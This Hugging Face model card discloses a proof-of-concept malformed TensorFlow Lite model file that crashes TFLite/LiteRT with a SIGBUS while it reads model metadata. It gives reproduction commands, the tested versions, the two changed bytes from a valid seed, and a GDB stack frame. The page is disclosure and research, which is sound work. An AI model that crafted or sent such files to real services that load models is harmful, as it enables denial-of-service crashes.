Hugging Face's logo

aleff-huggingface
/
tflite-readallmetadata-sigbus-poc

LiteRT
LiteRT
security
tensorflow-lite
model-file-format
poc
Model card Files
xet
 Community

TFLite ReadAllMetadata SIGBUS PoC

This repository contains a proof-of-concept .tflite model file that triggers a deterministic native SIGBUS when loaded by TensorFlow Lite / LiteRT.

The crash occurs during interpreter construction, before allocate_tensors() or invoke(), while TensorFlow Lite reads model metadata:

tflite::impl::FlatBufferModelBase<tflite::impl::FlatBufferModel>::ReadAllMetadata(...)

Files 

crash.tflite             Proof-of-concept malformed TFLite model
reproduce_sigbus.py      Minimal TensorFlow reproduction script
requirements.txt         Python dependency for stable TensorFlow reproduction
SHA256SUMS               SHA-256 checksum for the PoC file
evidence/                GDB, reproducibility, diff, and severity evidence

PoC hash 

dcef497b1db65cf6c556f6682a3606df3ea6e2cb1e41131ea958c9ce0f0cdc88  crash.tflite

Tested versions

The crash was reproduced on:

tensorflow==2.21.0
tf-nightly==2.22.0-dev20260525
ai-edge-litert==2.1.5
Python 3.12

Reproduction 

python3.12 -m venv /tmp/tflite-sigbus-repro
source /tmp/tflite-sigbus-repro/bin/activate

python -m pip install --upgrade pip
python -m pip install -r requirements.txt

ulimit -c 0
python reproduce_sigbus.py crash.tflite
echo "rc=$?"

Expected behavior

Malformed .tflite files should be rejected cleanly with an exception or error status.

Actual behavior

The process terminates with SIGBUS:

[runtime] tensorflow=2.21.0
[phase] before tf.lite.Interpreter()
Bus error
rc=135

Reproducibility 

TensorFlow stable: rc=135 135 135
LiteRT:            rc=135 135 135
tf-nightly:        rc=135 135 135

Diff from valid seed

The malformed file differs from a valid seed model by only two bytes:

seed_len=952
case_len=952
common_prefix=400
common_suffix=550
seed_changed_region_len=2
case_changed_region_len=2
seed_changed_hex=04 00
case_changed_hex=ff 7f

GDB frame 

Program received signal SIGBUS, Bus error.

#0  __memcpy_avx_unaligned_erms ()
#1  tflite::impl::FlatBufferModelBase<tflite::impl::FlatBufferModel>::ReadAllMetadata(...)
#2  tflite::impl::InterpreterBuilder::InterpreterBuilder(...)
#3  tflite::interpreter_wrapper::InterpreterWrapper::CreateInterpreterWrapper(...)

Impact

A crafted .tflite model file can terminate a process that attempts to load it using TensorFlow Lite or LiteRT. This may affect systems that scan, validate, convert, or execute third-party model files.

No arbitrary code execution is claimed. The demonstrated impact is deterministic native process crash during model loading.

Downloads last month
9
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support